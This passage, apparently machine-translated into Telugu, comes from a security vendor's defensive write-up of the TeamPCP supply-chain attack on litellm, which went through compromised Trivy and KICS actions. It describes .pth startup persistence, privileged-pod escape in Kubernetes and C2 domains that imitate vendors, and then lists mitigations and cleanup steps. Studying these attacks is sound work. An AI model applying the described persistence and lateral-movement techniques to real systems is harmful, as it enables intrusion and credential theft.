తదుపరి లక్ష్యాలను చేరుకోవడానికి తొలి అడుగుగా సెక్యూరిటీ స్కానర్లను (ట్రివీ, కెఐసిఎస్) హ్యాక్ చేయడం అనేది ఒక కొత్త స్థాయి తీవ్రతరం. దాడి చేసినవారు కేవలం ఒక లైబ్రరీని మాత్రమే హ్యాక్ చేయలేదు — వారు సంస్థలు ఉపయోగించే సాధనాలనే హ్యాక్ చేశారు. గుర్తించడం రాజీపడిన లైబ్రరీలు. ఇది ఒక అంధప్రదేశాన్ని సృష్టిస్తుంది: హానికరమైన కోడ్ను పట్టుకోవాల్సిన స్కానర్, దానిని అందించే యంత్రాంగంగా మారుతుంది.
2. పైథాన్ .pth ఫైల్ నిలకడ (T1546)
మా litellm_init.pth v1.82.8 లోని టెక్నిక్ ప్రత్యేకంగా మోసపూరితమైనది. పైథాన్ .pth ఫైల్లు site-packages/ ప్రతి ఇంటర్ప్రెటర్ ప్రారంభంలో ప్రాసెస్ చేయబడతాయి; దీనితో ప్రారంభమయ్యే ఏదైనా పంక్తి import కోడ్గా అమలు చేయబడుతుంది. పేలోడ్ను ఒకేదానికి గొలుసుగా జోడించడం ద్వారా import ఈ ప్రకటన ప్రకారం, దాడి చేసేవాడు కేవలం litellm ఇంపోర్ట్ చేసినప్పుడు మాత్రమే కాకుండా, ప్రతి పైథాన్ ప్రాసెస్లోనూ ఎగ్జిక్యూషన్ను సాధిస్తాడు. దీని అర్థం, litellm ఇన్స్టాల్ చేయబడి, ఎప్పుడూ ఉపయోగించకపోయినా కూడా పేలోడ్ ఫైర్ అవుతుంది, మరియు రాజీపడిన డేటాను భర్తీ చేసే రెమెడియేషన్ను కూడా ఇది తట్టుకుంటుంది. .py తనిఖీ చేయకుండా ఫైళ్ళు .pth ఫైళ్లు.
3. ప్రివిలేజ్డ్ పాడ్ డిప్లాయ్మెంట్ ద్వారా కుబెర్నెటెస్ క్లస్టర్-వైడ్ లాటరల్ మూవ్మెంట్ (T1610, T1611)
ప్రతి క్లస్టర్ నోడ్లో ప్రివిలేజ్డ్ పాడ్లను స్వయంచాలకంగా సృష్టించడం — దీనితో hostPID, hostNetwork, హోస్ట్ ఫైల్ సిస్టమ్ మౌంట్, మరియు chroot ఒకే రాజీపడిన వర్క్లోడ్ను పూర్తి క్లస్టర్ రాజీగా మార్చడానికి, నిలకడను ఇన్స్టాల్ చేయడానికి — కంటైనర్ విస్తరణను (T1610) హోస్ట్కు తప్పించుకోవడంతో (T1611) కలుపుతుంది.
4. విక్రేతగా నటిస్తున్న C2 మౌలిక సదుపాయాలు
ఉపయోగించి models.litellm.cloud (లిటెల్లమ్ను అనుకరిస్తుంది) మరియు checkmarx.zone (చెక్ మార్క్స్ను అనుకరిస్తూ) C2/exfil ఎండ్పాయింట్లు నెట్వర్క్ పర్యవేక్షణను తప్పించుకునేలా రూపొందించబడ్డాయి. ఎగ్రెస్ ట్రాఫిక్ను సమీక్షించే SOC విశ్లేషకులు, చట్టబద్ధమైన వెండర్ డొమైన్లుగా కనిపించే వాటికి HTTPS కనెక్షన్లను చూస్తారు.
5. వేగవంతమైన ఇన్-ఫ్లైట్ పేలోడ్ ఇటరేషన్
ఇంపోర్ట్-టైమ్ ఎగ్జిక్యూషన్తో v1.82.7ను, ఆ తర్వాత 13 నిమిషాలకే స్టార్టప్-టైమ్ ఎగ్జిక్యూషన్తో v1.82.8ను ప్రచురించడం, దాడి చేసేవాడు నిజ సమయంలో పర్యవేక్షిస్తూ, తనకి తానుగా సర్దుబాటు చేసుకుంటున్నాడని చూపిస్తుంది. సోర్స్ కోడ్లో భద్రపరచబడిన, కామెంట్ చేయబడిన పేలోడ్ వేరియంట్లు (విభిన్న ఎన్క్రిప్షన్ స్కీమ్లతో) ఆపరేషన్ సమయంలో చురుకైన అభివృద్ధిని నిర్ధారిస్తున్నాయి.
ఏమి చేయవచ్చు
ఈ దాడి ప్రతి స్థాయిలో నమ్మకాన్ని దుర్వినియోగం చేస్తుంది: భద్రతా సాధనాలపై నమ్మకం, ప్యాకేజీ రిజిస్ట్రీలపై నమ్మకం, సుపరిచితంగా కనిపించే డొమైన్లపై నమ్మకం, CI/CD ఆటోమేషన్. దాని నుండి రక్షించుకోవాలంటే ఈ విశ్వాస సరిహద్దులలో ప్రతిదానినీ పటిష్టం చేయాలి:
ప్యాకేజీ వినియోగదారుల కోసం
- కేవలం వెర్షన్ ద్వారా కాకుండా, హ్యాష్ ద్వారా డిపెండెన్సీలను పిన్ చేయండి.
pip install litellm==1.82.6 --hash=sha256:...ఒకవేళ అవి కొద్దిసేపు తాజా వెర్షన్గా కనిపించినప్పటికీ, రాజీపడిన వెర్షన్లు ఇన్స్టాల్ కాకుండా నిరోధించి ఉండేది. - లాక్ఫైల్లను ఉపయోగించండి.
pip-compile,poetry.lockమరియుuv.lockఖచ్చితమైన వెర్షన్లను మరియు హాష్లను సంగ్రహించండి. CI/CD ఫ్లోటింగ్ వెర్షన్ స్పెసిఫైయర్ల నుండి కాకుండా, లాక్ఫైల్ల నుండి ఇన్స్టాల్ చేయాలి. - కోసం మానిటర్
.pthఫైళ్లు. క్రమం తప్పకుండా ఆడిట్ చేయండిsite-packages/ఊహించని కోసం.pthఫైల్స్ — ఇవి ప్రతి పైథాన్ ప్రారంభంలోనూ అమలు అవుతాయి మరియు తక్కువగా అంచనా వేయబడిన ఒక నిల్వ యంత్రాంగం. - ఎగ్రెస్ నెట్వర్క్ నియంత్రణలను అమలు చేయండి. బయటకు తరలించడం
models.litellm.cloudమరియు C2 పోలింగ్కుcheckmarx.zoneప్రొడక్షన్ ఎన్విరాన్మెంట్లలో అలోలిస్ట్ ఆధారిత ఎగ్రెస్ ఫిల్టరింగ్ ద్వారా పట్టుబడి ఉండవచ్చు.
ప్యాకేజీ నిర్వహకుల కోసం
- పిన్ CI/CD చర్యలు commit SHA, ట్యాగ్ కాదు. లైట్ఎల్ఎల్ఎమ్స్ pipeline పిన్ చేసిన వెర్షన్ లేకుండా ట్రివీని ఉపయోగించారు. ఒకవేళ అది రిఫరెన్స్ చేసి ఉంటే
aquasecurity/trivy-action@<commit-sha>బదులుగా@latest, రాజీపడిన చర్య అమలు చేయబడి ఉండేది కాదు. - స్వల్పకాలిక, పరిమిత ప్రచురణ టోకెన్లను ఉపయోగించండి. PyPI విశ్వసనీయ ప్రచురణకర్తలకు (OIDC-ఆధారిత) మరియు స్కోప్డ్ API టోకెన్లకు మద్దతు ఇస్తుంది. బయటకు తీయబడిన
PYPI_PUBLISHటోకెన్కు దీర్ఘకాలిక, అనియంత్రిత ప్రచురణ యాక్సెస్ ఉండకూడదు. - PyPIలో రెండు-కారకాల ప్రమాణీకరణను ప్రారంభించండి. నిర్వహణ సిబ్బంది అందరికీ 2FA తప్పనిసరి చేయండి మరియు సాధ్యమైన చోట హార్డ్వేర్ భద్రతా కీలను ఉపయోగించండి.
- ప్యాకేజీలపై సంతకం చేయండి. Sigstore/PEP 740 ధృవీకరణలు, ఒక ప్యాకేజీని ఆశించిన తయారీదారుడే తయారు చేశాడని వినియోగదారులు ధృవీకరించుకోవడానికి వీలు కల్పిస్తాయి. CI/CD pipelineదొంగిలించబడిన టోకెన్తో దాడి చేసే వ్యక్తి ద్వారా కాదు.
ప్లాట్ఫారమ్ ఆపరేటర్ల కోసం (PyPI, npm, GitHub)
- అసాధారణ ప్రచురణ సరళిని గుర్తించండి. సాధారణం కంటే భిన్నమైన IP లేదా టోకెన్ నుండి, 13 నిమిషాల వ్యవధిలో రెండు కొత్త వెర్షన్లు విడుదల చేయబడితే, ప్యాకేజీ ఇన్స్టాల్ చేయడానికి వీలయ్యే ముందు సమీక్ష కోసం నిలిపివేత లేదా ఆటోమేటెడ్ స్కానింగ్ జరగాలి.
- ట్రస్టెడ్ పబ్లిషర్స్ స్వీకరణను వేగవంతం చేయండి. OIDC-ఆధారిత పబ్లిషింగ్ ప్యాకేజీలను నిర్దిష్ట రిపోజిటరీలు మరియు వర్క్ఫ్లోలకు అనుసంధానిస్తుంది, దీనివల్ల దొంగిలించబడిన టోకెన్లు అసలు వ్యవస్థ వెలుపల నిరుపయోగంగా మారతాయి. CI/CD సందర్భం.
- ప్రచురణ సమయంలో మాల్వేర్ స్కానింగ్ను అమలు చేయండి. proxy_server.py లోని బేస్64-డీకోడ్ చేయబడిన పేలోడ్ను పబ్లిష్ సమయంలో స్టాటిక్ అనాలిసిస్ ద్వారా గుర్తించవచ్చు.
పర్యావరణ వ్యవస్థ కోసం
- భద్రతా సాధనాలను కీలక మౌలిక సదుపాయాలుగా పరిగణించండి. ట్రివీ మరియు చెక్మార్క్స్ KICS లను లక్షలాది మంది ఉపయోగిస్తున్నారు. pipelineవారు స్కాన్ చేసే ప్యాకేజీల మాదిరిగానే, వారి గిట్హబ్ యాక్షన్లు కూడా అదే కఠినత్వంతో సంతకం చేయబడి, పిన్ చేయబడి, పర్యవేక్షించబడాలి.
- రన్టైమ్ డిటెక్షన్లో పెట్టుబడి పెట్టండి. స్టాటిక్ విశ్లేషణ ఒక్కటే ప్రతి అస్పష్టపరిచే పద్ధతిని పట్టుకోలేదు. ప్యాకేజీ ఇన్స్టాల్ యొక్క రన్టైమ్ పర్యవేక్షణ hooksఅనుకోని నెట్వర్క్ కనెక్షన్లు మరియు అనుమానాస్పద ఫైల్ యాక్సెస్ పద్ధతుల నుండి లోతైన రక్షణను అందిస్తుంది.
- ముప్పు సమాచారాన్ని మరింత వేగంగా పంచుకోండి. వివిధ విక్రేతల మధ్య సమన్వయం వేగంగా జరిగి ఉంటే, litellmకు పట్టిన 5.5 గంటల ఎక్స్పోజర్ వ్యవధి ఇంకా తక్కువగా ఉండేది. Xygeni MEW, Socket, మరియు Snyk వంటి ఆటోమేటెడ్ స్కానింగ్ సేవలు ఈ అసాధారణతను గుర్తించాయి — మానవ నిర్ధారణ మరియు రిజిస్ట్రీ ప్రతిస్పందన సమయమే ఇక్కడ ప్రధాన అడ్డంకి.
ముగింపు
TeamPCP ప్రచారం ఒక కీలకమైన ఘట్టం software supply chain securityమొదట సెక్యూరిటీ స్కానర్లను దెబ్బతీసి, వాటిని విలువైన AI మౌలిక సదుపాయాలకు సోపానాలుగా ఉపయోగించడం ద్వారా, సప్లై చైన్ అనేది దానిలోని అత్యంత బలహీనమైన పరోక్ష ఆధారపడటం వలనే బలంగా ఉంటుందని, మరియు మిమ్మల్ని సురక్షితంగా ఉంచడానికి మీరు విశ్వసించే భద్రతా సాధనం ఆ ఆధారపడటమే కావచ్చునని దాడి చేసినవారు నిరూపించారు.
LLM రాజీ అనేది AI మౌలిక సదుపాయాలకు పెరుగుతున్న ప్రమాదాన్ని ప్రత్యేకంగా హైలైట్ చేస్తుంది. LLM ప్రాక్సీ గేట్వేలు అవుతున్న కొద్దీ standard నమూనా కోసం enterprise AI విస్తరణలో, వారు API కీలు, క్లౌడ్ ఆధారాలు మరియు సున్నితమైన డేటాకు ప్రాప్యతను ఒకే భాగంలో కేంద్రీకరిస్తారు. ఆ భాగాన్ని దెబ్బతీయడం అనేది మొత్తం AI స్టాక్కు ఒక కీలకమైన తాళం వంటిది.
5.5 గంటల వ్యవధిలో litellm 1.82.7 లేదా 1.82.8ను ఇన్స్టాల్ చేసిన సంస్థలు దీనిని పూర్తి క్రెడెన్షియల్ రాజీగా పరిగణించాలి: ప్రభావిత సిస్టమ్లలోని అన్ని సీక్రెట్లను మార్చండి, Kubernetes క్లస్టర్లను ఆడిట్ చేయండి. node-setup-* పాడ్స్ లో kube-systemఏదైనా తొలగించండి sysmon.service systemd యూనిట్లు, మరియు తనిఖీ చేయండి litellm_init.pth పైథాన్లో site-packages/ డైరెక్టరీలు. అధికారిక డాకర్ ఇమేజ్ వినియోగదారులు (ghcr.io/berriai/litellm) ప్రభావితం కాలేదు, ఎందుకంటే చిత్రం దాని ఆధారాలను స్థిరపరిచింది మరియు ఎక్స్పోజర్ విండో సమయంలో పునర్నిర్మించబడలేదు.
రచయిత గురుంచి
సహ వ్యవస్థాపకుడు & CTO
లూయిస్ రోడ్రిగ్జ్ Xygeni Securityలో సహ-వ్యవస్థాపకుడు మరియు CTO. అప్లికేషన్ సెక్యూరిటీలో 20+ సంవత్సరాల అనుభవంతో, అతను AppSec రక్షణ మరియు అధునాతన కోడ్-విశ్లేషణ సామర్థ్యాలపై దృష్టి పెడతాడు, ఇవి బృందాలు వాస్తవ డెలివరీ ప్రమాదాన్ని తగ్గించడంలో సహాయపడతాయి.




